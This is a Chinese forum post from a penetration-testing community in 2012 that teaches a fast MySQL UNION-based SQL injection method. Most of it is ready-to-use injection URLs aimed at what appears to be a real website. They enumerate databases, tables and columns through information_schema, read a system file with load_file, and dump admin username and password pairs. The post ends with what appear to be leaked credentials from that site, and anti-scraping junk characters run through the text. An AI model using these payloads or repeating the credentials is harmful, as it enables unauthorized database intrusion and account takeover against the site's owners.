中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]
作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
8 r* Q6 F. v+ S! {' n但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人! M, f6 t3 \- O
* c4 n. G: }1 `' e

5 R+ z( a. R8 O优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
9 n1 M; E* [6 {
- [6 r! }1 E4 F; K缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢..., V9 p) u/ W' W" `, J; l& f* l

, C& a( ?  n- H2 C% S下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
) f/ \* _; T5 V% L在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等1 h8 H* u6 ?4 N' j8 s

4 ^/ G7 F9 X: p" U2 `6 Ahttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,171 y1 ~$ ?" B. l2 O0 `, v, e2 l

4 s4 `5 P  q$ m读出所有库:, f% `8 ~# d3 }/ {7 z' H# B& l
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
1 h! Z3 V, l- D; Q. a& Z# H& s  ~
5 }& {  Y9 |& C) S& r  C7 X- V9 h- {3 _8 n) O3 e( n
, J$ P& D6 x( _3 f2 y; \  \
读出所有表:1 u# x/ X) a1 P2 c- a
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
4 a% E6 o, z8 y# Z0 u0 J. H. a) B9 p
读出所有表字段:
) t2 T. F, |! G" ~http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
9 `( c1 d: {& z. J2 H5 s4 Y/ _( F*/ (97,100,109,105,110)为admin的ascii码 依次类推
1 C2 j& S! Y( X: [2 I1 J: b! J) C  b
读出所有表字段里的内容:
) L# m) Z2 H) l; O# [7 j: {http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
& W" n, G! A2 l0 j. s1 O& m6 c5 m. O- v; N+ t, a0 Y

/ U+ I5 g2 {' f
% Z5 K  Q# j2 K/ s. s: z7 D; S7 M2 ]
% q4 U# O4 v* Q5 K5 L

# u  o+ G4 ]: c1 \  a7 i3 I) }http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
% N3 `. Z+ ], N) o. ~6 z3 u& f( a; K  `# d& [0 ?* d0 W% n
0 K5 W4 L5 t6 f2 ]) k) ~
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%232 U% K. {$ _, Z! a9 r& M: p" I

6 f. t. @, m" E; t, R- j4 x( thttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23' O- v5 s$ |4 z0 |6 [+ f

( w5 }+ q. Y1 q
- Z. H  a, \% u0 b4 E/ r1 chttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
+ e! t; D' o2 A" _9 m/ D$ {' [& `+ O2 K- @  T8 A7 f
7 P4 I  y9 [- d& I  n4 R
        webmaster:dzb521123,simlab:simadmin20043233" l% w( l2 L) ?1 p




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2